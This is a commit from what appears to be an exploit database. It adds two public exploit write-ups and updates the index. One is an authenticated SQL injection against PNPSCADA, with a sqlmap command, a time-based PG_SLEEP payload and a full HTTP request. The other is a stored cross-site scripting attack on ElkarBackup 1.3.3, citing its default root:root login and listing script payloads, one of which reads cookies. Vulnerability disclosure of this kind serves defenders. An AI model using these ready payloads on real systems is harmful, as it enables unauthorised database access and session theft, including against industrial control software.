DB: 2020-08-21
2 changes to exploits/shellcodes ElkarBackup 1.3.3 - Persistent Cross-Site Scripting PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
This commit is contained in:
Offensive Security
parent
135de074fb
commit
caf6833937
3 changed files with 99 additions and 0 deletions
57
exploits/hardware/webapps/48757.txt
Normal file
57
exploits/hardware/webapps/48757.txt
Normal file
|
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
|
||||
# Google Dork: -
|
||||
# Date: 2020-08-17
|
||||
# Exploit Author: İsmail ERKEK
|
||||
# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
|
||||
# Version: 2.200816204020
|
||||
# Tested on: -
|
||||
|
||||
|
||||
1. Description:
|
||||
----------------------
|
||||
|
||||
PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in
|
||||
/browse.jsp. Exploiting this issue could allow an attacker to compromise
|
||||
the application, access or modify data, or exploit latent vulnerabilities
|
||||
in the underlying database.
|
||||
|
||||
2. Proof of Concept:
|
||||
----------------------
|
||||
|
||||
In Burpsuite intercept the request from one of the affected pages with
|
||||
'interf' parameter and save it like fuel.req Then run SQLmap to extract the
|
||||
data from the database:
|
||||
|
||||
sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent
|
||||
|
||||
3. Example payload:
|
||||
----------------------
|
||||
|
||||
(time-based blind)
|
||||
|
||||
memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
|
||||
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831
|
||||
|
||||
4. Burpsuite request:
|
||||
----------------------
|
||||
|
||||
POST /browse.jsp HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
|
||||
Trident/5.0)
|
||||
Connection: close
|
||||
Referer:
|
||||
http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 93
|
||||
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37
|
||||
|
||||
memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
|
||||
|
||||
|
||||
|
||||
Best Regards.
|
||||
Ek alanı
|
||||
40
exploits/php/webapps/48756.txt
Normal file
40
exploits/php/webapps/48756.txt
Normal file
|
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
|
||||
# Date: 2020-08-14
|
||||
# Exploit Author: Enes Özeser
|
||||
# Vendor Homepage: https://www.elkarbackup.org/
|
||||
# Version: 1.3.3
|
||||
# Tested on: Linux
|
||||
|
||||
1- Go to following url. >> http://(HOST)/elkarbackup/login
|
||||
2- Default username and password is root:root. We must know login credentials.
|
||||
3- Go to "Jobs" and press "Add client" button.
|
||||
4- Write XSS payload in "Name" section.
|
||||
5- Press "Save" button.
|
||||
|
||||
(( Executable XSS Payloads ))
|
||||
|
||||
1- "><script>alert('XSS Confirmed!');</script>
|
||||
2- "><script>alert("XSS Confirmed!");</script>
|
||||
3- "><script>alert(document.cookie);</script>
|
||||
4- "><script>alert(document.domain);</script>
|
||||
|
||||
|
||||
(( REQUEST ))
|
||||
|
||||
POST /elkarbackup/client/2 HTTP/1.1
|
||||
Host: (HOST)
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://(HOST)/elkarbackup/client/2
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 358
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&
|
||||
Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&
|
||||
Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&
|
||||
Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
|
||||
|
|
@ -42996,3 +42996,5 @@ id,file,description,date,author,type,platform,port
|
|||
48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
|
||||
48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,
|
||||
48755,exploits/hardware/webapps/48755.txt,"Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal",2020-08-19,Tuygun,webapps,hardware,
|
||||
48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php,
|
||||
48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue